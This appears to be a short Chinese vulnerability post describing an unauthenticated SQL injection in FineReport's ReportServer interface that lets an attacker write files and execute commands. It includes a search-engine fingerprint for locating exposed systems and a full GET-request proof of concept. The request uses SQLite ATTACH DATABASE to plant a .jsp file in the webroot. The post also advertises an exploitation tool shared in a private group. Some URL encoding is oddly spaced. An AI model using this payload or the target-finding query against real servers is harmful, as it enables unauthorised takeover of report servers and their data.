帆软FineReport报表 ReportServer SQL注入getshell

文章预览

漏洞描述 帆软软件有限公司FineReport存在SQL注入漏洞，该漏洞是由于/view/ReportServer接口存在未授权sql注入，攻击者可利用该漏洞利用sql注入写入文件，造成远程命令执行，控制目标服务器。 网络测绘 app = "帆软-数据决策系统" 漏洞poc GET  /webroot/decision/view/ReportServer?test= = ${__fr_locale__=sql('FRDemo',DECODE('%EF%BB%BFATTACH %20 DATABASE %20 %27 .. %2 Fwebapps %2 Fwebroot %2 Fuu9iu.jsp %27 %20 as %20 uu9iu %3 B'),1,1)} ${__fr_locale__=sql('FRDemo',DECODE('%EF%BB%BFCREATE %20 TABLE %20 uu9iu.exp2 %28 data %20 text %29 %3 B'),1,1)} ${__fr_locale__=sql('FRDemo',DECODE('%EF%BB%BFINSERT %20 INTO %20 uu9iu.exp2 %28 data %29 %20 VALUES %20 %28 %27 Qax360nb %27 %29 %3 B'),1,1)}  HTTP/1.1 漏洞检测与利用 工具获取 帆软漏洞检测与利用工具已上传内部圈子，可扫码加入获取。 🍻 🍻 🍻 🍻 🍻 🍻 不要等待机会，而要创造机会。 每一个不曾起舞的日子，都 ………………………………